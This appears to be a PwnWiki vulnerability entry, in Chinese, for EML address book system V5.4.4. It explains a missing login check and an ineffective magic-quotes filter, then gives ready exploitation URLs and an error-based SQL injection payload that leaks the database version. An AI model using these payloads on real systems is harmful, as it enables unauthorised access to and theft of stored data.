EML企业通讯录管理系统经典版V5.4.4 未授權訪問&SQL注入漏洞

From PwnWiki
Revision as of 12:27, 14 April 2021 by Pwnwiki (talk | contribs) (Created page with "==未授權訪問== <code>action/action.address.php</code> <pre> header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); ..... </pre> 頁面...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

未授權訪問

action/action.address.php 

header("Content-type: text/html; charset=utf-8");

if(!defined('CORE'))exit("error!"); 

.....

頁面未加用戶是否登錄判斷,打開頁面是普通用戶權限。 (系統是可以註冊的。)

SQL注入

lib/func.class.php 

function _RunMagicQuotes(&$svar){
	if(!get_magic_quotes_gpc())	{
		if( is_array($svar) ){
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}else{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

過濾的函數_RunMagicQuotes,判斷是否開啟了get_magic_quotes_gpc,如果開啟就用gpc過濾,如果沒有開啟用addslashes過濾。 5.4.0 始終返回 FALSE,因為這個魔術引號功能已經從 PHP 中移除了。

漏洞利用

未授權訪問Payload

http://192.168.116.138/eml/index.php?action=address

SQL注入Payload

get方法,判斷注入是否存在: 

http://192.168.116.138/eml/index.php?action=address&pageNum=/1

post方法: 

http://192.168.116.138/eml/index.php?action=address&pageNum=0

numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));
Retrieved from "https://pwnwiki.com/index.php?title=EML企业通讯录管理系统经典版V5.4.4_未授權訪問%26SQL注入漏洞&oldid=1644"